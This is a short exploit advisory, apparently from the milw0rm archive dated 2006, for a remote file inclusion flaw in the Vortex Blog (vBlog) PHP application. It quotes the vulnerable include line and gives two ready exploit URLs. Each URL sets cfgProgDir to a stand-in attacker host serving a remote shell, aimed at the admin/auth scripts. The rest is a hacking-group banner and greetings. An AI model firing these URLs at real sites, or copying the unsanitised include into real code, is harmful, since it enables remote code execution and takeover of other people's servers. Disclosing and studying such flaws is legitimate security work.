********************************************************************************************************** WwW.Deltahacking.NeT (Priv8 Site) WwW.Deltahacking.Ir (Public Site) ********************************************************************************************************** * Portal Name :Vortex Blog AKA vBlog * Class = Remote File Inclusion ; * Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip * Found by = Dr.Pantagon (rezayavari2006@yahoo.com) -------------------------------------------------------------------------------------------- -------------- - Vulnerable Code include($cfgProgDir . "session.php"); ++++++++++++++++++++++++++++++++++++++++++++ - Exploit: http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell? http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell? -------------------------------------------------------------------------------------------- -------------- Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord Special Thanks To Best My Friend : Tanha ********************************************************************************************************** # milw0rm.com [2006-11-08]